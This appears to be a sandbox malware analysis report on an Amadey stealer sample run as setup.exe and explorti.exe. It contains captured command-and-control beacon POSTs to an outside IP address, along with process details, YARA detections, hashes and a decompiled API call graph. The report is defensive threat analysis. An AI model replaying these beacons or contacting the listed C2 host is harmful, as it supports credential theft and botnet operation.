                    Jul 26, 2024 21:05:01.035115957 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:05:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:05:01.040838003 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:05:01.294691086 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:05:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    48192.168.2.656771185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:05:01.405976057 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:05:02.575886011 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:05:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:05:02.575953960 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:05:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:05:02.576189995 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:05:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:05:02.578614950 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:05:02.837013006 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:05:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    49192.168.2.656772185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:05:02.953674078 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:05:03.708009958 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:05:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    50192.168.2.656773185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:05:03.723368883 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:05:04.498737097 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:05:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    51192.168.2.656774185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:05:04.629357100 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:05:05.432271957 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:05:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:05:05.435864925 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:05:05.689827919 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:05:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    52192.168.2.656775185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:05:05.828634024 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:05:06.668731928 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:05:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    53192.168.2.656776185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:05:06.678340912 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:05:07.445532084 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:05:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:15:03:01
                    Start date:26/07/2024
                    Path:C:\Users\user\Desktop\setup.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\setup.exe"
                    Imagebase:0xc20000
                    File size:1'971'200 bytes
                    MD5 hash:F6DCA815EB37C8AA9BA54C603624227B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2184897638.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2141203577.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:15:03:05
                    Start date:26/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Imagebase:0x2b0000
                    File size:1'971'200 bytes
                    MD5 hash:F6DCA815EB37C8AA9BA54C603624227B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2228974412.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2188519642.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 62%, ReversingLabs
                    Reputation:low
                    Has exited:true

                    Target ID:3
                    Start time:15:03:05
                    Start date:26/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
                    Imagebase:0x2b0000
                    File size:1'971'200 bytes
                    MD5 hash:F6DCA815EB37C8AA9BA54C603624227B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2189691685.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2230067978.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:10
                    Start time:15:04:00
                    Start date:26/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Imagebase:0x2b0000
                    File size:1'971'200 bytes
                    MD5 hash:F6DCA815EB37C8AA9BA54C603624227B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.2724598095.0000000005300000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Reset < >
                      Memory Dump Source
                      • Source File: 00000000.00000002.2192014040.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4df0000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5664c164c38129d201c810f310824fabbcf628b12fe89558a9e646925a6ce460
                      • Instruction ID: 0b2c667394a1217d67bee6659832e7497e81d7f72c352b1f2736e2f2a7c31ca4
                      • Opcode Fuzzy Hash: 5664c164c38129d201c810f310824fabbcf628b12fe89558a9e646925a6ce460
                      • Instruction Fuzzy Hash: D4C0126B748015DA40B2614669151767A25B15B3323774503F1C7DB543B289E568B121
                      Memory Dump Source
                      • Source File: 00000000.00000002.2192014040.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4df0000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4bfd5e0e55178f43c8e67563f78b3d56e2ce57e82cfce23d989beb311de8a473
                      • Instruction ID: 9508dff32a5c44f61844ae30c23f0164e30ece4f2481e4a63b113746980e42b3
                      • Opcode Fuzzy Hash: 4bfd5e0e55178f43c8e67563f78b3d56e2ce57e82cfce23d989beb311de8a473
                      • Instruction Fuzzy Hash: 8BC02222714114D3407224021C564327E08711B3213234902B2C3DF943F20CE890B011
                      Memory Dump Source
                      • Source File: 00000000.00000002.2192014040.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4df0000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: aea2dc7af2db5952bc924f4f8f7857b03b28f50c46d7cfa0a68fa9666cf34cd5
                      • Instruction ID: eac6ba68c018620843c330e7bc322e80672b3d359818ae1ae779fe8ebd4ede18
                      • Opcode Fuzzy Hash: aea2dc7af2db5952bc924f4f8f7857b03b28f50c46d7cfa0a68fa9666cf34cd5
                      • Instruction Fuzzy Hash: 48E0B6EB2891143DF01194823F14AF7A77DD2D2B30731C937F402D5846D2D50A4E6071

                      Execution Graph

                      Execution Coverage:8.6%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:7.2%
                      Total number of Nodes:610
                      Total number of Limit Nodes:41
                      execution_graph 13273 2ed6ef 13276 2ed6fc __fassign 13273->13276 13274 2ed727 RtlAllocateHeap 13275 2ed73a __dosmaperr 13274->13275 13274->13276 13276->13274 13276->13275 13277 2e6beb 13283 2e6bf7 13277->13283 13279 2e6c26 13280 2e6c35 13279->13280 13281 2e6c43 13279->13281 13284 2e6c99 9 API calls 13280->13284 13297 2e68bd 13281->13297 13289 2e8aaf 13283->13289 13285 2e6c3f 13284->13285 13286 2e6c5d 13288 2e6c71 ___free_lconv_mon 13286->13288 13300 2e6c99 13286->13300 13290 2e8ab4 __fassign 13289->13290 13293 2e8abf 13290->13293 13312 2ed4f4 13290->13312 13309 2e651d 13293->13309 13294 2ed727 RtlAllocateHeap 13295 2ed73a __dosmaperr 13294->13295 13296 2e8af2 __fassign 13294->13296 13295->13279 13296->13294 13296->13295 13331 2e683a 13297->13331 13299 2e68cf 13299->13286 13301 2e6cc4 __cftof 13300->13301 13307 2e6ca7 __cftof __dosmaperr 13300->13307 13302 2e6d06 CreateFileW 13301->13302 13308 2e6cea __cftof __dosmaperr 13301->13308 13303 2e6d2a 13302->13303 13304 2e6d38 13302->13304 13367 2e6e01 GetFileType 13303->13367 13381 2e6d77 13304->13381 13307->13288 13308->13288 13319 2e63f7 13309->13319 13313 2ed500 __fassign 13312->13313 13314 2ed55c __cftof __dosmaperr __fassign 13313->13314 13315 2e651d __fassign 2 API calls 13313->13315 13314->13293 13318 2ed6ee __fassign 13315->13318 13316 2ed727 RtlAllocateHeap 13317 2ed73a __dosmaperr 13316->13317 13316->13318 13317->13293 13318->13316 13318->13317 13320 2e6405 __fassign 13319->13320 13321 2e6450 13320->13321 13324 2e645b 13320->13324 13321->13296 13329 2ea1c2 GetPEB 13324->13329 13326 2e6465 13327 2e646a GetPEB 13326->13327 13328 2e647a __fassign 13326->13328 13327->13328 13330 2ea1dc __fassign 13329->13330 13330->13326 13332 2e685a 13331->13332 13336 2e6851 13331->13336 13332->13336 13337 2eb4bb 13332->13337 13336->13299 13338 2eb4ce 13337->13338 13340 2e6890 13337->13340 13338->13340 13345 2ef46b 13338->13345 13341 2eb4e8 13340->13341 13342 2eb4fb 13341->13342 13344 2eb510 13341->13344 13342->13344 13350 2ee571 13342->13350 13344->13336 13347 2ef477 __fassign 13345->13347 13346 2ef4c6 13346->13340 13347->13346 13348 2e8aaf __fassign 4 API calls 13347->13348 13349 2ef4eb 13348->13349 13351 2ee57b 13350->13351 13354 2ee489 13351->13354 13353 2ee581 13353->13344 13358 2ee495 __fassign ___free_lconv_mon 13354->13358 13355 2ee4b6 13355->13353 13356 2e8aaf __fassign 4 API calls 13357 2ee528 13356->13357 13359 2ee564 13357->13359 13363 2ea5ee 13357->13363 13358->13355 13358->13356 13359->13353 13364 2ea611 13363->13364 13365 2e8aaf __fassign 4 API calls 13364->13365 13366 2ea687 13365->13366 13368 2e6e3c 13367->13368 13380 2e6ed2 __dosmaperr 13367->13380 13369 2e6e56 __cftof 13368->13369 13403 2e7177 13368->13403 13371 2e6e75 GetFileInformationByHandle 13369->13371 13369->13380 13372 2e6e8b 13371->13372 13371->13380 13389 2e70c9 13372->13389 13376 2e6ea8 13377 2e6f71 SystemTimeToTzSpecificLocalTime 13376->13377 13378 2e6ebb 13377->13378 13379 2e6f71 SystemTimeToTzSpecificLocalTime 13378->13379 13379->13380 13380->13308 13426 2e7314 13381->13426 13383 2e6d85 13384 2e6d8a __dosmaperr 13383->13384 13385 2e70c9 4 API calls 13383->13385 13384->13308 13386 2e6da3 13385->13386 13387 2e7177 RtlAllocateHeap 13386->13387 13388 2e6dc2 13387->13388 13388->13308 13390 2e70df _wcsrchr 13389->13390 13398 2e6e97 13390->13398 13407 2eb9e4 13390->13407 13392 2e7123 13393 2eb9e4 4 API calls 13392->13393 13392->13398 13394 2e7134 13393->13394 13395 2eb9e4 4 API calls 13394->13395 13394->13398 13396 2e7145 13395->13396 13397 2eb9e4 4 API calls 13396->13397 13396->13398 13397->13398 13399 2e6f71 13398->13399 13400 2e6f89 13399->13400 13401 2e6fa9 SystemTimeToTzSpecificLocalTime 13400->13401 13402 2e6f8f 13400->13402 13401->13402 13402->13376 13404 2e7190 13403->13404 13406 2e71a4 __dosmaperr 13404->13406 13418 2eb568 13404->13418 13406->13369 13408 2eb9f2 13407->13408 13411 2eb9f8 __cftof __dosmaperr 13408->13411 13412 2eba2d 13408->13412 13410 2eba28 13410->13392 13411->13392 13413 2eba57 13412->13413 13416 2eba3d __cftof __dosmaperr 13412->13416 13414 2e683a __fassign 4 API calls 13413->13414 13413->13416 13417 2eba81 13414->13417 13415 2eb9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13415->13417 13416->13410 13417->13415 13417->13416 13420 2eb592 __cftof 13418->13420 13419 2eb5ae __dosmaperr ___free_lconv_mon 13419->13406 13420->13419 13422 2ed6ef 13420->13422 13425 2ed6fc __fassign 13422->13425 13423 2ed727 RtlAllocateHeap 13424 2ed73a __dosmaperr 13423->13424 13423->13425 13424->13419 13425->13423 13425->13424 13427 2e7338 13426->13427 13429 2e733e 13427->13429 13430 2e7036 13427->13430 13429->13383 13431 2e7042 __dosmaperr 13430->13431 13436 2eb87b 13431->13436 13433 2e7068 13433->13429 13434 2e705a __dosmaperr 13434->13433 13435 2eb87b RtlAllocateHeap 13434->13435 13435->13433 13439 2eb6de 13436->13439 13438 2eb894 13438->13434 13440 2eb6ee 13439->13440 13442 2eb6f5 13440->13442 13443 2f1ef8 13440->13443 13442->13438 13446 2f1d22 13443->13446 13445 2f1f0f 13445->13442 13447 2f1d54 13446->13447 13449 2f1d40 __cftof __dosmaperr 13446->13449 13448 2eb568 RtlAllocateHeap 13447->13448 13447->13449 13448->13449 13449->13445 13987 2cb7e9 13988 2cb6e5 11 API calls 13987->13988 13989 2cb811 Concurrency::details::_Reschedule_chore 13988->13989 13990 2cb836 13989->13990 13994 2ccade 13989->13994 13992 2cb648 11 API calls 13990->13992 13993 2cb84e 13992->13993 13995 2ccafc 13994->13995 13996 2ccaec TpCallbackUnloadDllOnCompletion 13994->13996 13995->13990 13996->13995 13570 2b7400 13571 2b7435 shared_ptr 13570->13571 13575 2b752f shared_ptr 13571->13575 13576 2cd041 13571->13576 13573 2b75bd 13573->13575 13580 2ccff7 13573->13580 13578 2cd051 13576->13578 13577 2cd05a 13577->13573 13578->13577 13584 2cd0c9 13578->13584 13581 2cd007 13580->13581 13582 2cd0af 13581->13582 13583 2cd0ab RtlWakeAllConditionVariable 13581->13583 13582->13575 13583->13575 13585 2cd0d7 SleepConditionVariableCS 13584->13585 13587 2cd0f0 13584->13587 13585->13587 13587->13578 13681 2c6ae0 13682 2c6b10 13681->13682 13685 2c46c0 13682->13685 13684 2c6b5c Sleep 13684->13682 13688 2c46fb 13685->13688 13702 2c4d80 shared_ptr 13685->13702 13686 2c4e69 shared_ptr 13686->13684 13689 2bbd60 5 API calls 13688->13689 13688->13702 13700 2c4753 shared_ptr __dosmaperr 13689->13700 13690 2c4fee shared_ptr 13723 2b7d00 13690->13723 13691 2c4f25 shared_ptr 13691->13690 13695 2c6ab6 13691->13695 13693 2c4ffd 13729 2b82b0 13693->13729 13696 2c46c0 19 API calls 13695->13696 13698 2c6b5c Sleep 13696->13698 13697 2c4a0d 13699 2bbd60 5 API calls 13697->13699 13697->13702 13698->13695 13703 2c4a72 shared_ptr 13699->13703 13700->13697 13701 2e8979 4 API calls 13700->13701 13701->13697 13702->13686 13713 2b65b0 13702->13713 13703->13702 13706 2c42a0 13703->13706 13705 2c5016 shared_ptr 13705->13684 13707 2c42e2 13706->13707 13708 2c4556 13707->13708 13711 2c4308 shared_ptr 13707->13711 13710 2c3550 16 API calls 13708->13710 13709 2c4520 shared_ptr 13709->13702 13710->13709 13711->13709 13733 2c3550 13711->13733 13722 5520bc0 13713->13722 13714 2b660f LookupAccountNameA 13715 2b6662 13714->13715 13716 2b2280 4 API calls 13715->13716 13717 2b6699 shared_ptr 13716->13717 13718 2b2280 4 API calls 13717->13718 13719 2b6822 shared_ptr 13717->13719 13720 2b6727 shared_ptr 13718->13720 13719->13691 13720->13719 13721 2b2280 4 API calls 13720->13721 13721->13720 13722->13714 13725 2b7d66 shared_ptr __cftof 13723->13725 13724 2b7ea3 GetNativeSystemInfo 13726 2b7ea7 13724->13726 13725->13724 13725->13726 13728 2b7eb8 shared_ptr 13725->13728 13726->13728 13817 2e8a81 13726->13817 13728->13693 13732 2b8315 shared_ptr __cftof 13729->13732 13730 2b8454 GetNativeSystemInfo 13731 2b8333 13730->13731 13731->13705 13732->13730 13732->13731 13734 2c3b92 shared_ptr std::_Xinvalid_argument 13733->13734 13735 2c358f shared_ptr 13733->13735 13734->13711 13735->13734 13740 2c38f5 shared_ptr __dosmaperr 13735->13740 13746 2baca0 13735->13746 13736 2e8979 4 API calls 13738 2c3a8a 13736->13738 13738->13734 13739 2c3e52 13738->13739 13742 2c3b9d 13738->13742 13744 2c3ab2 13738->13744 13772 2c2e20 13739->13772 13740->13734 13740->13736 13755 2c1dd0 13742->13755 13751 2c07f0 13744->13751 13748 2badf0 __cftof 13746->13748 13747 2bae16 shared_ptr 13747->13740 13748->13747 13790 2b5500 13748->13790 13750 2baf7e 13752 2c0870 __dosmaperr 13751->13752 13753 2e8979 4 API calls 13752->13753 13754 2c0a6d 13753->13754 13758 2c1e6b shared_ptr __dosmaperr 13755->13758 13756 2c1e78 13759 2be440 6 API calls 13756->13759 13757 2c2936 shared_ptr std::_Xinvalid_argument 13757->13734 13758->13756 13758->13757 13760 2e8979 4 API calls 13758->13760 13759->13757 13762 2c2265 shared_ptr 13760->13762 13761 2e6659 RtlAllocateHeap 13763 2c267a 13761->13763 13762->13757 13762->13761 13763->13756 13764 2e66e7 4 API calls 13763->13764 13765 2c268b shared_ptr __dosmaperr 13764->13765 13765->13757 13766 2e8979 4 API calls 13765->13766 13767 2c2759 13766->13767 13767->13756 13767->13757 13768 2c27d1 13767->13768 13769 2be440 6 API calls 13768->13769 13770 2c2843 13769->13770 13770->13757 13771 2b5df0 2 API calls 13770->13771 13771->13757 13774 2c2ec5 shared_ptr __cftof 13772->13774 13778 2c2e64 13772->13778 13773 2be440 6 API calls 13779 2c3423 shared_ptr 13773->13779 13775 2c32de InternetCloseHandle InternetCloseHandle 